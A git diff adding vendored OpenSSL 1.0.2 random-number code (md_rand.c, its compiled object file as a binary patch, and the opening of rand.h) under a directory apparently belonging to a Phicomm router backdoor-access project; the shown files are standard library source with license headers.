+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#define OPENSSL_FIPSEVP
+
+#ifdef MD_RAND_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+
+#include <assert.h>
+#include <stdio.h>
+#include <string.h>
+
+#include "e_os.h"
+
+#include <openssl/crypto.h>
+#include <openssl/rand.h>
+#include "rand_lcl.h"
+
+#include <openssl/err.h>
+
+#ifdef BN_DEBUG
+# define PREDICT
+#endif
+
+/* #define PREDICT      1 */
+
+#define STATE_SIZE      1023
+static int state_num = 0, state_index = 0;
+static unsigned char state[STATE_SIZE + MD_DIGEST_LENGTH];
+static unsigned char md[MD_DIGEST_LENGTH];
+static long md_count[2] = { 0, 0 };
+
+static double entropy = 0;
+static int initialized = 0;
+
+static unsigned int crypto_lock_rand = 0; /* may be set only when a thread
+                                           * holds CRYPTO_LOCK_RAND (to
+                                           * prevent double locking) */
+/* access to lockin_thread is synchronized by CRYPTO_LOCK_RAND2 */
+/* valid iff crypto_lock_rand is set */
+static CRYPTO_THREADID locking_threadid;
+
+#ifdef PREDICT
+int rand_predictable = 0;
+#endif
+
+const char RAND_version[] = "RAND" OPENSSL_VERSION_PTEXT;
+
+static void ssleay_rand_cleanup(void);
+static void ssleay_rand_seed(const void *buf, int num);
+static void ssleay_rand_add(const void *buf, int num, double add_entropy);
+static int ssleay_rand_nopseudo_bytes(unsigned char *buf, int num);
+static int ssleay_rand_pseudo_bytes(unsigned char *buf, int num);
+static int ssleay_rand_status(void);
+
+RAND_METHOD rand_ssleay_meth = {
+    ssleay_rand_seed,
+    ssleay_rand_nopseudo_bytes,
+    ssleay_rand_cleanup,
+    ssleay_rand_add,
+    ssleay_rand_pseudo_bytes,
+    ssleay_rand_status
+};
+
+RAND_METHOD *RAND_SSLeay(void)
+{
+    return (&rand_ssleay_meth);
+}
+
+static void ssleay_rand_cleanup(void)
+{
+    OPENSSL_cleanse(state, sizeof(state));
+    state_num = 0;
+    state_index = 0;
+    OPENSSL_cleanse(md, MD_DIGEST_LENGTH);
+    md_count[0] = 0;
+    md_count[1] = 0;
+    entropy = 0;
+    initialized = 0;
+}
+
+static void ssleay_rand_add(const void *buf, int num, double add)
+{
+    int i, j, k, st_idx;
+    long md_c[2];
+    unsigned char local_md[MD_DIGEST_LENGTH];
+    EVP_MD_CTX m;
+    int do_not_lock;
+
+    if (!num)
+        return;
+
+    /*
+     * (Based on the rand(3) manpage)
+     *
+     * The input is chopped up into units of 20 bytes (or less for
+     * the last block).  Each of these blocks is run through the hash
+     * function as follows:  The data passed to the hash function
+     * is the current 'md', the same number of bytes from the 'state'
+     * (the location determined by in incremented looping index) as
+     * the current 'block', the new key data 'block', and 'count'
+     * (which is incremented after each use).
+     * The result of this is kept in 'md' and also xored into the
+     * 'state' at the same locations that were used as input into the
+     * hash function.
+     */
+
+    /* check if we already have the lock */
+    if (crypto_lock_rand) {
+        CRYPTO_THREADID cur;
+        CRYPTO_THREADID_current(&cur);
+        CRYPTO_r_lock(CRYPTO_LOCK_RAND2);
+        do_not_lock = !CRYPTO_THREADID_cmp(&locking_threadid, &cur);
+        CRYPTO_r_unlock(CRYPTO_LOCK_RAND2);
+    } else
+        do_not_lock = 0;
+
+    if (!do_not_lock)
+        CRYPTO_w_lock(CRYPTO_LOCK_RAND);
+    st_idx = state_index;
+
+    /*
+     * use our own copies of the counters so that even if a concurrent thread
+     * seeds with exactly the same data and uses the same subarray there's
+     * _some_ difference
+     */
+    md_c[0] = md_count[0];
+    md_c[1] = md_count[1];
+
+    memcpy(local_md, md, sizeof md);
+
+    /* state_index <= state_num <= STATE_SIZE */
+    state_index += num;
+    if (state_index >= STATE_SIZE) {
+        state_index %= STATE_SIZE;
+        state_num = STATE_SIZE;
+    } else if (state_num < STATE_SIZE) {
+        if (state_index > state_num)
+            state_num = state_index;
+    }
+    /* state_index <= state_num <= STATE_SIZE */
+
+    /*
+     * state[st_idx], ..., state[(st_idx + num - 1) % STATE_SIZE] are what we
+     * will use now, but other threads may use them as well
+     */
+
+    md_count[1] += (num / MD_DIGEST_LENGTH) + (num % MD_DIGEST_LENGTH > 0);
+
+    if (!do_not_lock)
+        CRYPTO_w_unlock(CRYPTO_LOCK_RAND);
+
+    EVP_MD_CTX_init(&m);
+    for (i = 0; i < num; i += MD_DIGEST_LENGTH) {
+        j = (num - i);
+        j = (j > MD_DIGEST_LENGTH) ? MD_DIGEST_LENGTH : j;
+
+        MD_Init(&m);
+        MD_Update(&m, local_md, MD_DIGEST_LENGTH);
+        k = (st_idx + j) - STATE_SIZE;
+        if (k > 0) {
+            MD_Update(&m, &(state[st_idx]), j - k);
+            MD_Update(&m, &(state[0]), k);
+        } else
+            MD_Update(&m, &(state[st_idx]), j);
+
+        /* DO NOT REMOVE THE FOLLOWING CALL TO MD_Update()! */
+        MD_Update(&m, buf, j);
+        /*
+         * We know that line may cause programs such as purify and valgrind
+         * to complain about use of uninitialized data.  The problem is not,
+         * it's with the caller.  Removing that line will make sure you get
+         * really bad randomness and thereby other problems such as very
+         * insecure keys.
+         */
+
+        MD_Update(&m, (unsigned char *)&(md_c[0]), sizeof(md_c));
+        MD_Final(&m, local_md);
+        md_c[1]++;
+
+        buf = (const char *)buf + j;
+
+        for (k = 0; k < j; k++) {
+            /*
+             * Parallel threads may interfere with this, but always each byte
+             * of the new state is the XOR of some previous value of its and
+             * local_md (itermediate values may be lost). Alway using locking
+             * could hurt performance more than necessary given that
+             * conflicts occur only when the total seeding is longer than the
+             * random state.
+             */
+            state[st_idx++] ^= local_md[k];
+            if (st_idx >= STATE_SIZE)
+                st_idx = 0;
+        }
+    }
+    EVP_MD_CTX_cleanup(&m);
+
+    if (!do_not_lock)
+        CRYPTO_w_lock(CRYPTO_LOCK_RAND);
+    /*
+     * Don't just copy back local_md into md -- this could mean that other
+     * thread's seeding remains without effect (except for the incremented
+     * counter).  By XORing it we keep at least as much entropy as fits into
+     * md.
+     */
+    for (k = 0; k < (int)sizeof(md); k++) {
+        md[k] ^= local_md[k];
+    }
+    if (entropy < ENTROPY_NEEDED) /* stop counting when we have enough */
+        entropy += add;
+    if (!do_not_lock)
+        CRYPTO_w_unlock(CRYPTO_LOCK_RAND);
+
+#if !defined(OPENSSL_THREADS) && !defined(OPENSSL_SYS_WIN32)
+    assert(md_c[1] == md_count[1]);
+#endif
+}
+
+static void ssleay_rand_seed(const void *buf, int num)
+{
+    ssleay_rand_add(buf, num, (double)num);
+}
+
+int ssleay_rand_bytes(unsigned char *buf, int num, int pseudo, int lock)
+{
+    static volatile int stirred_pool = 0;
+    int i, j, k, st_num, st_idx;
+    int num_ceil;
+    int ok;
+    long md_c[2];
+    unsigned char local_md[MD_DIGEST_LENGTH];
+    EVP_MD_CTX m;
+#ifndef GETPID_IS_MEANINGLESS
+    pid_t curr_pid = getpid();
+#endif
+    int do_stir_pool = 0;
+
+#ifdef PREDICT
+    if (rand_predictable) {
+        static unsigned char val = 0;
+
+        for (i = 0; i < num; i++)
+            buf[i] = val++;
+        return (1);
+    }
+#endif
+
+    if (num <= 0)
+        return 1;
+
+    EVP_MD_CTX_init(&m);
+    /* round upwards to multiple of MD_DIGEST_LENGTH/2 */
+    num_ceil =
+        (1 + (num - 1) / (MD_DIGEST_LENGTH / 2)) * (MD_DIGEST_LENGTH / 2);
+
+    /*
+     * (Based on the rand(3) manpage:)
+     *
+     * For each group of 10 bytes (or less), we do the following:
+     *
+     * Input into the hash function the local 'md' (which is initialized from
+     * the global 'md' before any bytes are generated), the bytes that are to
+     * be overwritten by the random bytes, and bytes from the 'state'
+     * (incrementing looping index). From this digest output (which is kept
+     * in 'md'), the top (up to) 10 bytes are returned to the caller and the
+     * bottom 10 bytes are xored into the 'state'.
+     *
+     * Finally, after we have finished 'num' random bytes for the
+     * caller, 'count' (which is incremented) and the local and global 'md'
+     * are fed into the hash function and the results are kept in the
+     * global 'md'.
+     */
+    if (lock)
+        CRYPTO_w_lock(CRYPTO_LOCK_RAND);
+
+    /* prevent ssleay_rand_bytes() from trying to obtain the lock again */
+    CRYPTO_w_lock(CRYPTO_LOCK_RAND2);
+    CRYPTO_THREADID_current(&locking_threadid);
+    CRYPTO_w_unlock(CRYPTO_LOCK_RAND2);
+    crypto_lock_rand = 1;
+
+    if (!initialized) {
+        RAND_poll();
+        initialized = 1;
+    }
+
+    if (!stirred_pool)
+        do_stir_pool = 1;
+
+    ok = (entropy >= ENTROPY_NEEDED);
+    if (!ok) {
+        /*
+         * If the PRNG state is not yet unpredictable, then seeing the PRNG
+         * output may help attackers to determine the new state; thus we have
+         * to decrease the entropy estimate. Once we've had enough initial
+         * seeding we don't bother to adjust the entropy count, though,
+         * because we're not ambitious to provide *information-theoretic*
+         * randomness. NOTE: This approach fails if the program forks before
+         * we have enough entropy. Entropy should be collected in a separate
+         * input pool and be transferred to the output pool only when the
+         * entropy limit has been reached.
+         */
+        entropy -= num;
+        if (entropy < 0)
+            entropy = 0;
+    }
+
+    if (do_stir_pool) {
+        /*
+         * In the output function only half of 'md' remains secret, so we
+         * better make sure that the required entropy gets 'evenly
+         * distributed' through 'state', our randomness pool. The input
+         * function (ssleay_rand_add) chains all of 'md', which makes it more
+         * suitable for this purpose.
+         */
+
+        int n = STATE_SIZE;     /* so that the complete pool gets accessed */
+        while (n > 0) {
+#if MD_DIGEST_LENGTH > 20
+# error "Please adjust DUMMY_SEED."
+#endif
+#define DUMMY_SEED "...................." /* at least MD_DIGEST_LENGTH */
+            /*
+             * Note that the seed does not matter, it's just that
+             * ssleay_rand_add expects to have something to hash.
+             */
+            ssleay_rand_add(DUMMY_SEED, MD_DIGEST_LENGTH, 0.0);
+            n -= MD_DIGEST_LENGTH;
+        }
+        if (ok)
+            stirred_pool = 1;
+    }
+
+    st_idx = state_index;
+    st_num = state_num;
+    md_c[0] = md_count[0];
+    md_c[1] = md_count[1];
+    memcpy(local_md, md, sizeof md);
+
+    state_index += num_ceil;
+    if (state_index > state_num)
+        state_index %= state_num;
+
+    /*
+     * state[st_idx], ..., state[(st_idx + num_ceil - 1) % st_num] are now
+     * ours (but other threads may use them too)
+     */
+
+    md_count[0] += 1;
+
+    /* before unlocking, we must clear 'crypto_lock_rand' */
+    crypto_lock_rand = 0;
+    if (lock)
+        CRYPTO_w_unlock(CRYPTO_LOCK_RAND);
+
+    while (num > 0) {
+        /* num_ceil -= MD_DIGEST_LENGTH/2 */
+        j = (num >= MD_DIGEST_LENGTH / 2) ? MD_DIGEST_LENGTH / 2 : num;
+        num -= j;
+        MD_Init(&m);
+#ifndef GETPID_IS_MEANINGLESS
+        if (curr_pid) {         /* just in the first iteration to save time */
+            MD_Update(&m, (unsigned char *)&curr_pid, sizeof curr_pid);
+            curr_pid = 0;
+        }
+#endif
+        MD_Update(&m, local_md, MD_DIGEST_LENGTH);
+        MD_Update(&m, (unsigned char *)&(md_c[0]), sizeof(md_c));
+
+#ifndef PURIFY                  /* purify complains */
+        /*
+         * The following line uses the supplied buffer as a small source of
+         * entropy: since this buffer is often uninitialised it may cause
+         * programs such as purify or valgrind to complain. So for those
+         * builds it is not used: the removal of such a small source of
+         * entropy has negligible impact on security.
+         */
+        MD_Update(&m, buf, j);
+#endif
+
+        k = (st_idx + MD_DIGEST_LENGTH / 2) - st_num;
+        if (k > 0) {
+            MD_Update(&m, &(state[st_idx]), MD_DIGEST_LENGTH / 2 - k);
+            MD_Update(&m, &(state[0]), k);
+        } else
+            MD_Update(&m, &(state[st_idx]), MD_DIGEST_LENGTH / 2);
+        MD_Final(&m, local_md);
+
+        for (i = 0; i < MD_DIGEST_LENGTH / 2; i++) {
+            /* may compete with other threads */
+            state[st_idx++] ^= local_md[i];
+            if (st_idx >= st_num)
+                st_idx = 0;
+            if (i < j)
+                *(buf++) = local_md[i + MD_DIGEST_LENGTH / 2];
+        }
+    }
+
+    MD_Init(&m);
+    MD_Update(&m, (unsigned char *)&(md_c[0]), sizeof(md_c));
+    MD_Update(&m, local_md, MD_DIGEST_LENGTH);
+    if (lock)
+        CRYPTO_w_lock(CRYPTO_LOCK_RAND);
+    MD_Update(&m, md, MD_DIGEST_LENGTH);
+    MD_Final(&m, md);
+    if (lock)
+        CRYPTO_w_unlock(CRYPTO_LOCK_RAND);
+
+    EVP_MD_CTX_cleanup(&m);
+    if (ok)
+        return (1);
+    else if (pseudo)
+        return 0;
+    else {
+        RANDerr(RAND_F_SSLEAY_RAND_BYTES, RAND_R_PRNG_NOT_SEEDED);
+        ERR_add_error_data(1, "You need to read the OpenSSL FAQ, "
+                           "http://www.openssl.org/support/faq.html");
+        return (0);
+    }
+}
+
+static int ssleay_rand_nopseudo_bytes(unsigned char *buf, int num)
+{
+    return ssleay_rand_bytes(buf, num, 0, 1);
+}
+
+/*
+ * pseudo-random bytes that are guaranteed to be unique but not unpredictable
+ */
+static int ssleay_rand_pseudo_bytes(unsigned char *buf, int num)
+{
+    return ssleay_rand_bytes(buf, num, 1, 1);
+}
+
+static int ssleay_rand_status(void)
+{
+    CRYPTO_THREADID cur;
+    int ret;
+    int do_not_lock;
+
+    CRYPTO_THREADID_current(&cur);
+    /*
+     * check if we already have the lock (could happen if a RAND_poll()
+     * implementation calls RAND_status())
+     */
+    if (crypto_lock_rand) {
+        CRYPTO_r_lock(CRYPTO_LOCK_RAND2);
+        do_not_lock = !CRYPTO_THREADID_cmp(&locking_threadid, &cur);
+        CRYPTO_r_unlock(CRYPTO_LOCK_RAND2);
+    } else
+        do_not_lock = 0;
+
+    if (!do_not_lock) {
+        CRYPTO_w_lock(CRYPTO_LOCK_RAND);
+
+        /*
+         * prevent ssleay_rand_bytes() from trying to obtain the lock again
+         */
+        CRYPTO_w_lock(CRYPTO_LOCK_RAND2);
+        CRYPTO_THREADID_cpy(&locking_threadid, &cur);
+        CRYPTO_w_unlock(CRYPTO_LOCK_RAND2);
+        crypto_lock_rand = 1;
+    }
+
+    if (!initialized) {
+        RAND_poll();
+        initialized = 1;
+    }
+
+    ret = entropy >= ENTROPY_NEEDED;
+
+    if (!do_not_lock) {
+        /* before unlocking, we must clear 'crypto_lock_rand' */
+        crypto_lock_rand = 0;
+
+        CRYPTO_w_unlock(CRYPTO_LOCK_RAND);
+    }
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/md_rand.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/md_rand.o
new file mode 100644
index 0000000000000000000000000000000000000000..4a5e4a328fbc935825adbe805b6a4c425b2c1a1a
GIT binary patch
literal 10576
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand.h
new file mode 100644
index 0000000..2553afd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand.h
@@ -0,0 +1,150 @@
+/* crypto/rand/rand.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
